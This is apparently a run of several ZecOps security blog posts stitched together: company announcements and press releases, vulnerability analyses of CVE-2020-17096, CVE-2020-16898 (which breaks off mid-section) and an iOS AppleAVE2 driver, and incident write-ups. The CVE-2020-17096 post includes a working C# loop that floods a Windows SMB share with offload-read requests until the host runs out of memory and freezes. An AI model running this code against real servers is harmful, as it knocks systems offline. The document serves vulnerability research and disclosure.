As cyberattacks targeting mobile devices are on the rise, we continue to see massive adoption from both the private and public sectors. We are really excited to share two new features which will dramatically improve the ZecOps experience!
New “Always-on” Application for MacOS
ZecOps is making it even easier for users to perform complex investigations of their mobile devices. Now, users can inspect their mobile devices automatically each time the phone is connected to their laptop. ZecOps for Mobile supports both iOS and Android.
Send an inspection link to a customer or colleague
ZecOps administrators now have the ability to generate a unique link to download the ZecOps Collector App from the ZecOps Dashboard. The link can then be shared with the person/group whose device you wish to inspect via email, text, or Slack.
The Collector App can be downloaded on any laptop. This feature is ideal for incident responders, managed service providers, and SOC operators.
Phishing is a common social engineering attack that is used by scammers to steal personal information, including authentication credentials and credit card numbers. Being well known for more than 30 years, phishing is still the most common attack performed by cyber-criminals. There have been several attempts at combating phishing attacks, but no attempt has been able to successfully eliminate the problem.
One of the most common attack scenarios involves the attacker sending an email or a text message to the victim. The message, pretending to be from a trustworthy entity, links to a fake website which visually matches a legitimate site. Nowadays, most browsers include limited protection to phishing, relying on a list of known phishing domains. While such protection has value, it’s still easy to bypass.
To help combat phishing attacks, we developed a browser extension that takes a different approach. Instead of trying to determine whether a visited website is a fake website used for phishing, we augment the website with additional visual information, allowing the user to make an informed decision. The user can take into account context that the browser has no way of knowing, such as the origin of the link and the sensitivity of the information about to be entered.
The website identity
One of the most common types of phishing is tricking the user into entering credentials into a fake website. The traditional way of avoiding such phishing is to check the address bar and verify that the address matches the expected, legitimate website. Such a check requires some discipline, and is easy to miss amid a busy day.
The main goal of ZecOps Anti-Phishing Extension is to make it easy to determine the identity of a website, having a visual indication that is difficult to miss.
Take a look at the following example:
In this example, the victim navigated to a fake website pretending to be paypal.com. Without the extension (left part of the image), the only difference compared to the real website is a single character in the address bar (1 instead of l in “paypal”). With the extension, the victim gets critical information just before entering his credentials:
The website is visited for the first time. For a website such as PayPal, which the victim probably visited multiple times before, this is a red flag.
The domain name is very similar to another, well known domain name. In this case, the extension is able to recognize that “paypa1.com” is visually similar to “paypal.com”, making the phishing attempt obvious.
The elephant image is the visual identity of the website that the extension generated for paypa1.com, which is most likely to be different from the visual identity of paypal.com. If the victim signs into paypal.com often, he might notice that the image changed and that something is wrong. Users won’t be able to remember all images for all websites, but that’s another measure of caution that can prevent a successful attack, and is more effective for websites that are visited more often.
Misleading links
Another common phishing technique involves sending a message with a link that looks legit, but leads to a different website that is controlled by the attacker. ZecOps Anti-Phishing Extension detects such links and displays a warning message:
A word about privacy
We care about our users’ privacy, and so the extension doesn’t send any information back to us. We don’t collect the websites you visit, the messages you see, or anything at all. The only data we collect is through our phishing reporting form that you can voluntarily submit.
Installing the extension
You can get the extension in the extension store for your browser:
We created this project as a community project. If you’d like to learn about the other initiatives we have at ZecOps, we invite you to learn more about ZecOps Mobile EDR / DFIR solutions here.
Ehud Schneourson to provide cyberdefense expertise and tactical guidance to burgeoning mobile security startup, with additional appointments to be announced in the coming months
SAN FRANCISCO, April 1st, 2021 — ZecOps, the world’s most powerful platform to discover and analyze mobile cyber attacks, announced the formation of its international Defense Advisory Board. Ehud Schneourson, (ret.) Brigadier General and commander of Israel’s elite Unit 8200, was appointed as Chairman.
“It takes a submarine to discover other submarines, and ZecOps is the submarine we were all waiting for in the mobile security space.” said Ehud Schneourson. “Attackers used to care only about Google and Apple, but ZecOps created an entire category of problems for attackers. I’m thrilled to partner with ZecOps in their mission to protect our most sensitive assets, our mobile devices.”
“ZecOps is a true mobile EDR that is technically non-existent in the market today”, Schneourson summarized.
ZecOps’ success in the public and private sectors has been bolstered by the discovery of several advanced attacks. These include a “0-click” vulnerability on the default iOS Mail app, attacks on journalists in the Middle East, and others.
ZecOps estimates that there are hundreds of sophisticated organizations targeting mobile devices, many of whom sell their exploits on the black market. This claim is supported by ZecOps Mobile Threat Intelligence, which has shown a rapid increase in the number of mobile cyberattacks in the past year.
“The number of attacks that we have discovered on mobile devices is mind blowing. I can’t wait to see what else we’ll discover in the years to come,” said Zuk Avraham, co-founder and CEO of ZecOps. “Mobile devices have become our ‘single factor of authentication’, and the most desirable target for attackers. Our Defense Advisory Board understands and appreciates the creativity needed to establish proper mobile cyberdefense. I’m thrilled to bring Ehud onboard, and am excited to partner with him and the world’s defense leaders”.
About ZecOps:
ZecOps develops the world’s most powerful platform to discover and analyze mobile cyber attacks. Used by world-leading governments, enterprises, and individuals globally, ZecOps Mobile EDR provides a realistic and scalable approach to mobile threat hunting. ZecOps enables automated discovery of 0-day attacks and Advanced Persistent Threats (APTs), delivering anti cyber-espionage capabilities within minutes. Headquartered in San Francisco, ZecOps was co-founded by Zuk Avraham, a security researcher and serial entrepreneur who previously founded Zimperium.
The mobile security startup is among the top-ranked companies in the Security category
ZecOps, the automated platform for discovering mobile cyber threats has been named to Fast Company’s prestigious annual list of the World’s Most Innovative Companies for 2021. The Fast Company list honors businesses that have demonstrated the unique ability to service customers in rapidly evolving industries, like cybersecurity, with new and novel approaches.
“This is a major milestone for ZecOps, and confirms what our customers already know – that ZecOps mobile threat discovery is the most efficient way to evaluate the integrity of smartphones,” said Zuk Avraham, Co-Founder & CEO of ZecOps. “We’re grateful to Fast Company for acknowledging our innovative approach to discovering sophisticated attacks on mobile devices.”
ZecOps has seen tremendous customer growth in 2020, a time during which the company discovered several highly publicized vulnerabilities. These include a “0-click” vulnerability on the default iOS Mail app, attacks on journalists in the Middle East, and others. ZecOps is used by world-leaders, governments, leading enterprises, and targeted individuals concerned with discovering cyberattacks on mobile devices and performing threat hunting.
“In a year of unprecedented challenges, the companies on this list exhibit fearlessness, ingenuity, and creativity in the face of crisis,” said Fast Company Deputy Editor David Lidsky, who oversaw the issue with Senior Editor Amy Farley.
ABOUT ZECOPS
ZecOps is the world’s most powerful platform to discover and analyze mobile cyber attacks. Used by governments, enterprises, and individuals worldwide, ZecOps provides a realistic and scalable approach to mobile threat hunting. ZecOps enables automated discovery of 0-day attacks and Advanced Persistent Threats (APTs), delivering anti- cyber espionage analysis within minutes. Headquartered in San Francisco, ZecOps was co-founded by Zuk Avraham, a security researcher and serial entrepreneur who previously founded Zimperium.
ABOUT FAST COMPANY
Fast Company is the only media brand fully dedicated to the vital intersection of business, innovation, and design, engaging the most influential leaders, companies, and thinkers on the future of business. The editor-in-chief is Stephanie Mehta. Headquartered in New York City, Fast Company is published by Mansueto Ventures LLC, along with our sister publication Inc., and can be found online at www.fastcompany.com.
Following Google TAG announcement that a few profiles on twitter, were part of an APT campaign targeting security Researchers. According to Google TAG, these threat actors are North Koreans and they had multiple goals of establishing credibility by publishing a well thought of blog posts as well as interacting with researchers via Direct Messages and lure them to download and run an infected Visual Studio project.
Some of the fake profiles were: @z0x55g, @james0x40, @br0vvnn, @BrownSec3Labs
Using a Chrome 0day to infect clients?
In their post, Google TAG, mentioned that the attackers were able to pop a fully patched Windows box running Chrome.
From Google’s post:
In addition to targeting users via social engineering, we have also observed several cases where researchers have been compromised after visiting the actors’ blog. In each of these cases, the researchers have followed a link on Twitter to a write-up hosted on blog.br0vvnn[.]io, and shortly thereafter, a malicious service was installed on the researcher’s system and an in-memory backdoor would begin beaconing to an actor-owned command and control server. At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions.
Attacking Mobile Users?
According to ZecOps Mobile Threat Intelligence, the same threat actor might have used an Android 0day too.
If you entered this blog from your Android or iOS devices – we would like to examine your device using ZecOps Mobile DFIR tool to gather additional evidence. Please contact us as soon as convenient at [email protected]
Hear the news first
Only essential content
New vulnerabilities & announcements
News from ZecOps Research Team
Your subscription request to ZecOps Blog has been successfully sent.
This is an analysis of the CVE-2020-17096 vulnerability published by Microsoft on December 12, 2020. The remote code execution vulnerability assessed with Exploitation: “More Likely”, grabbed our attention among the last Patch Tuesday fixes.
Diffing ntfs.sys
Comparing the patched driver to the unpatched version with BinDiff, we saw that there’s only one changed function, NtfsOffloadRead.
The function is rather big, and from a careful comparison of the two driver versions, the only changed code is located at the very beginning of the function:
uint NtfsOffloadRead(PIRP_CONTEXT IrpContext, PIRP Irp)
{
PVOID decoded = NtfsDecodeFileObjectForRead(...);
if (!decoded) {
if (NtfsStatusDebugFlags) {
// ...
}
// *** Change 1: First argument changed from NULL to IrpContext
NtfsExtendedCompleteRequestInternal(NULL, Irp, 0xc000000d, 1, 0);
// *** Change 2: The following if block was completely removed
if (IrpContext && *(PIRP *)(IrpContext + 0x68) == Irp) {
*(PIRP *)(IrpContext + 0x68) = NULL;
}
if (NtfsStatusDebugFlags) {
// ...
}
return 0xc000000d;
}
// The rest of the function...
}
Triggering the vulnerable code
From the name of the function, we deduced that it’s responsible for handling offload read requests, part of the Offloaded Data Transfers functionality introduced in Windows 8. An offload read can be requested remotely via SMB by issuing the FSCTL_OFFLOAD_READ control code.
Indeed, by issuing the FSCTL_OFFLOAD_READ control code we’ve seen that the NtfsOffloadRead function is being called, but the first if branch is skipped. After some experimentation, we saw that one way to trigger the branch is by opening a folder, not a file, before issuing the offload read.
Exploring exploitation options
We looked at each of the two changes and tried to come up with the simplest way to cause some trouble to a vulnerable computer.
First change: The NtfsExtendedCompleteRequestInternal function wasn’t receiving the IrpContext parameter.
Briefly looking at NtfsExtendedCompleteRequestInternal, it seems that if the first parameter is NULL, it’s being ignored. Otherwise, the numerous fields of the IrpContext structure are being freed using functions such as ExFreePoolWithTag. The code is rather long and we didn’t analyze it thoroughly, but from a quick glance we didn’t find a way to misuse the fact that those functions aren’t being called in the vulnerable version. We observed, thought, that the bug causes a memory leak in the non-paged pool which is guaranteed to reside in physical memory.
We implemented a small tool that issues offload reads in an infinite loop. After a couple of hours, our vulnerable VM ran out of memory and froze, no longer responding to any input. Below you can see the Task Manager screenshots and the code that we used.
Second change: An IRP pointer field, part of IrpContex, was set to NULL.
From our quick attempt, we didn’t find a way to misuse the fact that the IRP pointer field is set to NULL. If you have any ideas, let us know.
What about remote code execution?
We’re curious about that as much as you are. Unfortunately, there’s a limited amount of time that we can invest in satisfying our curiosity. We went as far as finding the vulnerable code and triggering it to cause a memory leak and an eventual denial of service, but we weren’t able to exploit it for remote code execution.
It is possible that there’s no actual remote code execution here, and it was marked as such just in case, as it happened with the “Bad Neighbor” ICMPv6 Vulnerability (CVE-2020-16898). If you have any insights, we’ll be happy to hear about them.
CVE-2020-17096 POC (Denial of Service)
Before. An idle VM with a standard configuration and no running programs.
After. The same idle VM after triggering the memory leak, unresponsive.
using (var trans = new Smb2ClientTransport())
{
var ipAddress = System.Net.IPAddress.Parse(ip);
trans.ConnectShare(server, ipAddress, domain, user, pass, share, SecurityPackageType.Negotiate, true);
trans.Create(
remote_path,
FsDirectoryDesiredAccess.GENERIC_READ | FsDirectoryDesiredAccess.GENERIC_WRITE,
FsImpersonationLevel.Anonymous,
FsFileAttribute.FILE_ATTRIBUTE_DIRECTORY,
FsCreateDisposition.FILE_CREATE,
FsCreateOption.FILE_DIRECTORY_FILE);
FSCTL_OFFLOAD_READ_INPUT offloadReadInput = new FSCTL_OFFLOAD_READ_INPUT();
offloadReadInput.Size = 32;
offloadReadInput.FileOffset = 0;
offloadReadInput.CopyLength = 0;
byte[] requestInputOffloadRead = TypeMarshal.ToBytes(offloadReadInput);
while (true)
{
trans.SendIoctlPayload(CtlCode_Values.FSCTL_OFFLOAD_READ, requestInputOffloadRead);
trans.ExpectIoctlPayload(out _, out _);
}
}
C# code that causes the memory leak and the eventual denial of service. Was used with the Windows Protocol Test Suites.
ZecOps is proud to share that we detected multiple exploits by the threat actors that recently targeted Aljazeera’s journalists before it was made public. The attack detection was automatically detected using ZecOps Mobile DFIR.
In this blog post, we’ll share our analysis of the post-exploitation kernel panics observed on one of the targeted devices.
Key details on the attacks targeting journalists in Middle East:
First known attack: earliest signs of compromise on January 17th, 2020.
Was the attack successful: Yes – the device shows signs for successfully planted malware / rootkit.
Persistence: The device shows signs for a persistent malware that is capable of surviving reboots. It is unclear if the device was re-infected following an OS update, or that the malware also persisted between OS updates.
Attack Impact: The threat-operators were able to continuously access the device microphone, camera, and data including texts, and emails for the entire period.
Attribution: We named this threat actor Desert Cobra. We do not rule out that NSO (aka “NSO Group”) was involved in the other reporters’ cases that was published today by Citizen Labs. We refrain from naming the particular threat actor that targeted one of the victims in Citizen-Labs report, NSO, due to some activities that do not add-up with our Mobile Threat Intelligence on NSO. We also do not rule out that this device was potentially compromised by more than one threat actor simultaneously.
OS Update? We do recommend updating to the latest iOS version, however we have no evidence that this actually fixes any of the vulnerabilities that were exploited by this threat operator(s).
Post-exploitation Panic Analysis
A tale of two panics: MobileMail and mediaanalysisd: kauth_cred_t corruption
The following stack backtrace of the MobileMail panic indicates that the panic happened on function kauth_cred_unref:
kauth_cred_unref frees credential structures from the kernel. The following is the stack backtrace of the mediaanalysisd panic, it also panicked on function “kauth_cred_unref”:
Both of the panics happened inside “AUDIT_SESSION_UNREF”, which means the credential structure of the processes was corrupted.
A classic way to gain root access for a kernel exploit is to replace the credential structure of an attacker controlled process with the kernel credentials. Please note that it doesn’t necessarily mean MobileMail or mediaanalysisd was controlled, the corruption of the credential structures could have also happened due to wrong offsets during exploitation.
ZecOps customers: no further action is required. The deployed systems detect these activities. The complete report and full IOC list is available in ZecOps Threat Intelligence feed.
Hear the news first
Only essential content
New vulnerabilities & announcements
News from ZecOps Research Team
Your subscription request to ZecOps Blog has been successfully sent.
This is a story about a Microsoft Teams crash that we investigated recently. At first glance, it looked like a possible arbitrary code execution vulnerability, but after diving deeper we realized that there’s another explanation for the crash.
TLDR;
ZecOps ingested and analyzed an event that seems exploitable on a Windows machine from Microsoft Teams
This machine has a lot of other anomalies
ZecOps verifies anomalies such as: blue screens, sudden crashes, mobile restarts without clicking on the power button; and determines if they are related to cyber attacks, software/hardware issues, or configuration problems.
Spoiler alert (text beneath the black highlight):
After further analyzing the crash, we realized that the faulty hardware was causing this exploitable event to appear, and not related to an intentional attack. We suspect that a bit flip was caused due to a bad hardware component.
Business impact: Hardware problems are more common than we think. Repeating faulty hardware-issues lead to continuous loss of productivity, context-switches, and IT/Cyber disruptions. Identifying faulty hardware can save a lot of time. We recommend using the freely available and agent-less tool ZOTOMATE to identify what is SW/HW problems. ZecOps is leveraging machine-learning and its mobile threat intelligence, mobile DFIR, as well as endpoints and servers crash analysis solution, and mobile apps crash-analysis to perform such analysis at scale.
The crash
Looking at the call stack, we saw that the process crashed due to a stack overflow:
It can be seen from the call stack that the original exception occurred earlier, at address 00007ff7`8b93338a. Due to an incorrect exception handling, the RtlDispatchException function raised the STATUS_INVALID_DISPOSITION exception again and again in a loop, until no space was left in the stack and the process crashed. That’s an actual bug in Teams that Microsoft might want to fix, but it manifests itself only when the process is about to crash anyway, so that might not be a top priority.
The original exception
To extract the original exception that occurred on address 00007ff7`8b93338a, we did what Raymond Chen suggested in his blog post, Sucking the exception pointers out of a stack trace. Using the .cxr command with the context record structure passed to the KiUserExceptionDispatcher function, we got the following output:
The original exception was triggered by accessing an invalid pointer of the value 00010000`00000000. Not only does the pointer look invalid, It’s actually a non-canonical address in today’s hardware implementations of x86-64, which means that it can’t ever be allocated or become valid. Next, we looked at the assembly commands below the crash:
Very interesting! If we can control the rdi register at this point of the execution, that’s a great start for arbitrary code execution. All we need to control the instruction pointer is to be able to build a fake virtual table, or to use an existing one, and the lack of support for Control Flow Guard (CFG) makes things even easier. As a side note, there’s an issue about adding CFG support which is being actively worked on.
At this point, we wanted to find answers to the following questions:
How can this bug be reproduced?
What source of input can trigger the bug? Specifically, can it be triggered remotely?
To what extent can the pointer be controlled?
The original exception stack trace
In order to try and reproduce the crash, we needed to gather more information about what was going on when the exception occurred. We checked the original exception stack trace and got the following:
It can be deduced from the large offsets that something is wrong with the symbols, as Raymond Chen also explains in his blog post, Signs that the symbols in your stack trace are wrong. In fact, Teams comes with no symbols, and there’s no public symbol server for it, so the symbols we see in the stack trace are some of the few functions exported by name. Fortunately, Teams is based on Electron which is open source, so we were able to match the Teams functions on the stack to the same functions in Electron. At first, we tried to do that with a binary diffing tool, but it didn’t work so well due to the executable/symbol files being so large (exe – 120 MB, pdb – 2 GB), so we ended up matching the functions manually.
WTF was indeed our reaction when we saw where the exception occurred (which, of course, means Web Template Framework).
From what we can see, the hasOwnProperty object method was called, at which point the garbage collection was triggered, and the invalid pointer was accessed while processing one of its internal hash tables. Could it be that we found a memory bug in the V8 garbage collection? We believed it to be quite unlikely. And if so, how do we reproduce it?
Switching context
At this point we put the Teams crash on hold and went on to look at the other crashes which occurred on the same computer. Once we did that, it all became clear: it had several BSODs, all of the type MEMORY_CORRUPTION_ONE_BIT, indicating a faulty memory/storage hardware. And looks like that’s exactly what happened in the Teams crash: the faulty address was originally a NULL pointer, but because of a corrupted bit it became 00010000`00000000, causing the exception and the crash.
Conclusion
The conclusion is that the relevant computer needs to have its faulty hardware replaced, and of course there’s nothing wrong with V8’s garbage collection that has anything to do with the crash. That’s yet another reminder that hardware problems can cause various anomalies that are hard to explain, such as this Teams crash or crashing at the xor eax, eax instruction.
Hear the news first
Only essential content
New vulnerabilities & announcements
News from ZecOps Research Team
Your subscription request to ZecOps Blog has been successfully sent.
Abstract. Due to its popularity, iOS has attracted the attention of a large number of security researchers. Apple is constantly improving iOS security, develops and adapts new mitigations at a rapid pace. In terms of the effectiveness of mitigation measures, Apple increases the complexity of hacking iOS devices making it one of the hardest platforms to hack, however, it is not yet sufficient to block skilled individuals and well-funded groups from achieving remote code execution with elevated permissions, and persistence on the device.
This blog post is the first of multiple in a series of achieving elevated privileges on iOS.
This series of posts will go all the way until privileged access is obtained, the userspace exploit, as well as persistence on the device following a reboot. The full reports are currently available to iOS Threat Intelligence subscribers of ZecOps Mobile Threat Intelligence.
We will cover in detail how chaining a few bugs leads us to run code in the context of iOS kernel. Chaining such bugs with other exploits (e.g. the iOS MailDemon vulnerability, or other webkit based bugs) allow to gain full remote control over iOS devices.
This exploit was obtained as part of ZecOps Reverse Bounty, and donated to FreeTheSandbox initiative.
Freethesandbox.org – Free The Sandbox restrictions from iOS & Android devices
We would like to thank @08Tc3wBB for participating in ZecOps Reverse Bounty, and everyone else that helped in this project. We would also like to thank the Apple Security team for fixing these bugs and preventing further abuse of these bugs in up to date versions of iOS.
As we’re planning to release the additional blogs, we are already releasing a full Local Privilege Escalation chain that works on iOS 13.7 and earlier versions on both PAC and non-PAC devices.
We are making this release fully open-source for transparency. We believe that it is the best outcome to improve iOS research and platform security.
AppleAVE2 is a graphics IOKit driver that runs in kernel space and exists only on iOS and just like many other iOS-exclusive drivers, it’s not open-source and most of the symbols have been removed.
The driver cant be accessed from the default app sandbox environment, which reduces the chances of thorough analysis by Apple engineers or other researchers. The old implementation of this driver seems like a good attack surface and the following events demonstrate this well.
From the description of these vulnerabilities, some remain attractive even today, while powerful mitigations like PAC (for iPhones/iPads with A12 and above) and zone_require (iOS 13 and above) are present, arbitrary memory manipulation vulnerabilities such as CVE-2017-6997, CVE-2017-6999 play a far greater role than execution hijacking type, have great potential when used in chain with various information leakage vulnerabilities.
Despite the fact that these vulnerabilities have CVEs, which generally indicating that they have been fixed, Apple previously failed to fix bugs in one go and even bug regressions. With that in-mind, let’s commence our journey to hunt the next AVE vulnerability!
We will start off from the user-kernel data interaction interface:
AppleAVE2 exposes 9 (index 0-8) methods via rewriting IOUserClient::externalMethod:
Two exposed methods (index 0 and 1) allow to add or remove clientbuf(s), by the FIFO order.
The rest of the methods (index 3-8) are all eventually calling AppleAVE2Driver::SetSessionSettings through IOCommandGate to ensure thread-safe and avoid racing.
*1 Overlapping Segment Attack against dyld to achieve untethered jailbreak, first appearance in iOS 6 jailbreak tool — evasi0n, then similar approach shown on every public jailbreak, until after Pangu9, Apple seems finally eradicated the issue. *2 Apple accidentally re-introduces previously fixed security flaw in a newer version.
We mainly use method at index 7 to encode a clientbuf, which basically means to load many IOSurfaces via IDs provided from userland, and use method at index 6 to trigger trigger the multiple security flaws located inside AppleAVE2Driver::SetSessionSettings.
The following chart entails a relationship map between salient objects:
clientbuf is memory buffer allocated via IOMalloc, with quite significant size (0x29B98 in iOS 13.2).
Every clientbuf objext thats is being added contains pointers to the front and back, forming a double-linked list, so that the AppleAVE2Driver’s instance stores only the first clientbuf pointer.
The clientbuf contains multiple MEMORY_INFO structures. When user-space provides IOSurface, an iosurfaceinfo_buf will be allocated and then used to fill these structures.
iosurfaceinfo_buf contains a pointer to AppleAVE, as well as variables related to mapping from user-space to kernel-space.
As part of the clientbuf structure, the content of these InitInfo_block(s) is copied from user-controlled memory through IOSurface, this happens when the user first time calls another exposed method(At index 7) after adding a new clientbuf.
m_DPB is related to arbitrary memory reading primitive which will be explained later in this post.
Brief Introduction to IOSurface
In case if you are not familiar with IOSurface, read the below:
According to Apple’s description IOSurface is used for sharing hardware-accelerated buffer data ( for framebuffers and textures) more efficiently across multiple processes.
Unlike AppleAVE, an IOSurface object can be easily created by any userland process (using IOSurfaceRootUserClient). When creating an IOSurface object you will get a 32 bit long Surface ID number for indexing purposes in the kernel so that the kernel will be able to map the userspace memory associated with the object into kernel space.
Now with these concepts in mind let’s talk about the AppleAVE vulnerabilities.
The First Vulnerability (iOS 12.0 – iOS 13.1.3)
The first AppleAVE vulnerability has given CVE-2019-8795 and together with other two vulnerabilities — A Kernel Info-Leak(CVE-2019-8794) that simply defeats KASLR, and a Sandbox-Escape(CVE-2019-8797) that’s necessary to access AppleAVE, created an exploit chain on iOS 12 that was able to jailbreak the device. That’s until the final release of iOS 13, which destroyed the Sandbox-Escape by applying sandbox rules to the vulnerable process and preventing it from accessing AppleAVE, So the sandbox escape was replaced with another sandbox escape vulnerability that was discussed before.
The first AppleAVE vulnerability was eventually fixed after the update of iOS 13.2.
Here is a quick description about it and for more detailed-write up you can look at a previous writeup.
When a user releases a clientbuf, it will go through every MEMORY_INFO that the clientbuf contains and will attempt to unmap and release related memory resources.
The security flaw is quite obvious if you compare to how Apple fixed it:
The unfixed version has defect code due to an out-of-bounds access that allows an attacker to hijack kernel code execution in regular and PAC-enabled devices. This flaw can also become an arbitrary memory release primitive via the operator delete. and back then, before Apple fixed zone_require flaw on iOS 13.6, that was enough to achieve jailbreak on the latest iOS device.
The POC released today is just an initial version that will allow others to take it further. The POC shares basic analytics data with ZecOps to find additional vulnerabilities and help further secure iOS – this option can be disabled in the source.
In the next posts we’ll cover:
Additional vulnerabilities in the kernel
Exploiting these vulnerabilities
User-space vulnerabilities
The ultimate persistence mechanism that is likely to never be patched
Hear the news first
Only essential content
New vulnerabilities & announcements
News from ZecOps Research Team
Your subscription request to ZecOps Blog has been successfully sent.
At the Patch Tuesday on October 13, Microsoft published a patch and an advisory for CVE-2020-16898, dubbed “Bad Neighbor”, which was undoubtedly the highlight of the monthly series of patches. The bug has received a lot of attention since it was published as an RCE vulnerability, meaning that with a successful exploitation it could be made wormable. Initially, it was graded with a high CVSS score of 9.8/10, though it was later lowered to 8.8.
In days following the publication, several write-ups and POCs were published. We looked at some of them:
PoC BSOD for CVE-2020-16898 by 0xeb-bp – Another buffer overflow Proof-of-Concept, which we found to be easier to understand and work with than the other two.
The writeup by pi3 contains details that are not mentioned in the writeup by Quarkslab. It’s important to note that the bug can only be exploited when the source address is a link-local address. That’s a significant limitation, meaning that the bug cannot be exploited over the internet. In any case, both writeups explain the bug in general and then dive into triggering a buffer overflow, causing a system crash, without exploring other options.
We wanted to find out whether something else could be done with this vulnerability, aside from triggering the buffer overflow and causing a blue screen (BSOD)
In this writeup, we’ll share our findings.
The bug in a nutshell
The bug happens in the tcpip!Ipv6pHandleRouterAdvertisement function, which is responsible for handling incoming ICMPv6 packets of the type Router Advertisement (part of the Neighbor Discovery Protocol).
As can be seen from the packet structure, the packet consists of a 16-bytes header, followed by a variable amount of option structures. Each option structure begins with a type field and a length field, followed by specific fields for the relevant option type.
The bug happens due to an incorrect handling of the Recursive DNS Server Option (type 25, RFC 5006):
The Length field defines the length of the option in units of 8 bytes. The option header size is 8 bytes, and each IPv6 address adds additional 16 bytes to the length. That means that if the structure contains n IPv6 addresses, the length is supposed to be set to 1+2*n. The bug happens when the length is an even number, causing the code to incorrectly interpret the beginning of the next option structure.
As a starting point, let’s visualize 0xeb-bp’s POC and get some intuition about what’s going on and why it causes a stack overflow. Here is the ICMPv6 packet as constructed in the source code:
As you can see, the ICMPv6 packet is followed by two Recursive DNS Server options (type 25), and then a 256-bytes buffer. The two options have an even length of 4, which triggers the bug.
The tcpip!Ipv6pHandleRouterAdvertisement function that parses the packet does two iterations over the option structures. The first iteration does simple checks such as verifying the length field of the structures. The second iteration actually parses the option structures. Because of the bug, each iteration interprets the packet differently.
Here’s how the first iteration sees the packet:
Each option structure is just skipped according to the length field after doing some basic checks.
Here’s how the second iteration sees it:
This time, in the case of a Recursive DNS Server option, the length field is used to determine the amount of IPv6 addresses, which is calculated as following:
amount_of_addr = (length – 1) / 2
Then, the IPv6 addresses are processed, and the next iteration continues after the last processed IPv6 address, which, in case of an even length value, happens to be in the middle of the option structure compared to what the first iteration sees. This results in processing an option structure which wasn’t validated in the first iteration.
Specifically in this POC, 34 is not a valid length for option of the type 24, but because it wasn’t validated, the processing continues and too many bytes are copied on the stack, causing a stack overflow. Noteworthy, fragmentation is required for triggering the stack overflow (see the Quarkslab writeup for details).
Zooming out
Now we know how to trigger a stack overflow using CVE-2020-16898, but what are the checks that are made in each of the mentioned iterations? What other checks, aside from the length check, can we bypass using this bug? Which option types are supported, and is the handling different for each of them?
We didn’t find answers to these questions in any writeup, so we checked it ourselves.
Here are the relevant parts of the Ipv6pHandleRouterAdvertisement function, slightly simplified:
void Ipv6pHandleRouterAdvertisement(...)
{
// Initialization and other code...
if (!IsLinkLocalAddress(SrcAddress) && !IsLoopbackAddress(SrcAddress))
// error
// Initialization and other code...
NET_BUFFER NetBuffer = /* ... */;
// First loop
while (NetBuffer->DataLength >= 2)
{
BYTE TempTypeLen[2];
BYTE* TempTypeLenPtr = NdisGetDataBuffer(NetBuffer, 2, TempTypeLen, 1, 0);
WORD OptionLenInBytes = TempTypeLenPtr[1] * 8;
if (OptionLenInBytes == 0 || OptionLenInBytes > NetBuffer->DataLength)
// error
BYTE OptionType = TempTypeLenPtr[0];
switch (OptionType)
{
case 1: // Source Link-layer Address
// ...
break;
case 3: // Prefix Information
if (OptionLenInBytes != 0x20)
// error
BYTE TempPrefixInfo[0x20];
BYTE* TempPrefixInfoPtr = NdisGetDataBuffer(NetBuffer, 0x20, TempPrefixInfo, 1, 0);
BYTE PrefixInfoPrefixLength = TempRouteInfoPtr[2];
if (PrefixInfoPrefixLength > 128)
// error
break;
case 5: // MTU
// ...
break;
case 24: // Route Information Option
if (OptionLenInBytes > 0x18)
// error
BYTE TempRouteInfo[0x18];
BYTE* TempRouteInfoPtr = NdisGetDataBuffer(NetBuffer, 0x18, TempRouteInfo, 1, 0);
BYTE RouteInfoPrefixLength = TempRouteInfoPtr[2];
if (RouteInfoPrefixLength > 128 ||
(RouteInfoPrefixLength > 64 && OptionLenInBytes < 0x18) ||
(RouteInfoPrefixLength > 0 && OptionLenInBytes < 0x10))
// error
break;
case 25: // Recursive DNS Server Option
if (OptionLenInBytes < 0x18)
// error
// Added after the patch - this it the fix
//if (OptionLenInBytes - 8 % 16 != 0)
// // error
break;
case 31: // DNS Search List Option
if (OptionLenInBytes < 0x10)
// error
break;
}
NetBuffer->DataOffset += OptionLenInBytes;
NetBuffer->DataLength -= OptionLenInBytes;
// Other adjustments for NetBuffer...
}
// Rewind NetBuffer and do other stuff...
// Second loop...
while (NetBuffer->DataLength >= 2)
{
BYTE TempTypeLen[2];
BYTE* TempTypeLenPtr = NdisGetDataBuffer(NetBuffer, 2, TempTypeLen, 1, 0);
WORD OptionLenInBytes = TempTypeLenPtr[1] * 8;
if (OptionLenInBytes == 0 || OptionLenInBytes > NetBuffer->DataLength)
// error
BOOL AdvanceBuffer = TRUE;
BYTE OptionType = TempTypeLenPtr[0];
switch (OptionType)
{
case 3: // Prefix Information
BYTE TempPrefixInfo[0x20];
BYTE* TempPrefixInfoPtr = NdisGetDataBuffer(NetBuffer, 0x20, TempPrefixInfo, 1, 0);
BYTE PrefixInfoPrefixLength = TempRouteInfoPtr[2];
// Lots of code. Assumptions:
// PrefixInfoPrefixLength <= 128
break;
case 24: // Route Information Option
BYTE TempRouteInfo[0x18];
BYTE* TempRouteInfoPtr = NdisGetDataBuffer(NetBuffer, 0x18, TempRouteInfo, 1, 0);
BYTE RouteInfoPrefixLength = TempRouteInfoPtr[2];
// Some code. Assumptions:
// PrefixInfoPrefixLength <= 128
// Other, less interesting assumptions about PrefixInfoPrefixLength
break;
case 25: // Recursive DNS Server Option
Ipv6pUpdateRDNSS(..., NetBuffer, ...);
AdvanceBuffer = FALSE;
break;
case 31: // DNS Search List Option
Ipv6pUpdateDNSSL(..., NetBuffer, ...);
AdvanceBuffer = FALSE;
break;
}
if (AdvanceBuffer)
{
NetBuffer->DataOffset += OptionLenInBytes;
NetBuffer->DataLength -= OptionLenInBytes;
// Other adjustments for NetBuffer...
}
}
// More code...
}
As can be seen from the code, only 6 option types are supported in the first loop, the others are ignored. In any case, each header is skipped precisely according to the Length field.
Even less options, 4, are supported in the second loop. And similarly to the first loop, each header is skipped precisely according to the Length field, but this time with two exceptions: types 24 (the Route Information Option) and 25 (Recursive DNS Server Option) have functions which adjust the network buffer pointers by themselves, creating an opportunity for inconsistencies.
That’s exactly what is happening with this bug – the Ipv6pUpdateRDNSS function doesn’t adjust the network buffer pointers as expected when the length field is even.
Breaking assumptions
Essentially, this bug allows us to break the assumptions made by the second loop that are supposed to be verified in the first loop. The only option types that are relevant are the 4 types which appear in both loops, that’s also why we didn’t include the other 2 in the code of the first loop. One such assumption is the value of the length field, and that’s how the buffer overflow POC works, but let’s revisit them all and see what can be achieved.
Option type 3 – Prefix Information
